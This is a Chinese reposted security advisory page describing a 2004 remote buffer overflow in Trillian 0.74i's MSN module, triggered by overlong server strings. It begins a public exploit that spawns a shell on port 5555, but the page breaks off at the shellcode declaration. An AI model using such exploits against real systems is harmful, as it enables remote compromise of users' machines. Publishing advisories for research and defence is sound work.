安全公告（或线索）提供热线：51cto.editor@gma_编程指南(Cerulean Studios Trillian 0.74i MSN模块缓冲区溢出漏洞)

开发技术指南» 文章正文

引言：安全公告（或线索）提供热线：51cto.editor@gma

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：远程命令执行漏洞攻击类型：远程攻击发布日期： 2004-09-02 更新日期： 2004-09-06 受影响系统： oracle oracle10g application server 9.0.4.0oracle oracle10g application server 10......

·oracle 8i/9i sys »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：缓冲区溢出漏洞攻击类型：远程攻击发布日期： 2004-09-02 更新日期： 2004-09-06 受影响系统： oracle oracle8i standard edition 9.2 .0.2oracle oracle8i standard edition 9.2 .0.1......

Cerulean Studios Trillian 0.74i MSN模块缓冲区溢出漏洞

【相关文章:Anton Raharja PlaySM】

【扩展阅读:MIT Software I-CAFE多】

信息提供：【扩展信息:Adam Ismay Print Top】

安全公告（或线索）提供热线：51cto.editor@gmail.com

漏洞类别：

缓冲区溢出漏洞

攻击类型：

远程攻击

发布日期：

2004-09-08

更新日期：

2004-09-09

受影响系统：

cerulean studios trillian 0.74

安全系统：

无

漏洞报告人：

athias

漏洞描述：

cerulean studios trillian是一个聊天程序，与多种即时通讯程序使用相同的接口，包括aim、icq、yahoo! messenger、msn messenger与irc。

cerulean studios trillian在msn模块中存在缓冲区溢出问题，远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。

当trillian从msn消息服务器中接收到以换行结尾的超过4096字节的字符串时，可触发缓冲区溢出，攻击者利用"中间人"技术发送恶意字符串可能以进程权限在系统上执行任意指令。

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

cerulean studios trillian 0.74i buffer overflow in msn module exploit

created by komrade - http://unsecure.altervista.org

written for windows 2000 / windows xp.

tested on windows xp professional sp0.

this exploit spawn a shell on port 5555, you have just to execute the

program and connect to port 5555.

#include <windows.h>

#include <winsock.h>

#include <stdio.h>

#include <string.h>

int main(int argc,char **argv){

char shellcode[] =

... 下一页

·oracle多个未明安全漏洞 »显示摘要«

摘要：信息提供：安全公告（或线索）提供热线：51cto.editor@gmail.com 漏洞类别：安全漏洞攻击类型：远程攻击发布日期： 2004-08-04 更新日期： 2004-09-06 受影响系统： oracle oracle 8i enterprise edition 8.1.7.1.0oracle oracle 8i enterprise edition 8.1.......

» 本期热门文章：

· 热门栏目：

» 相关精选文章

» 其它相关：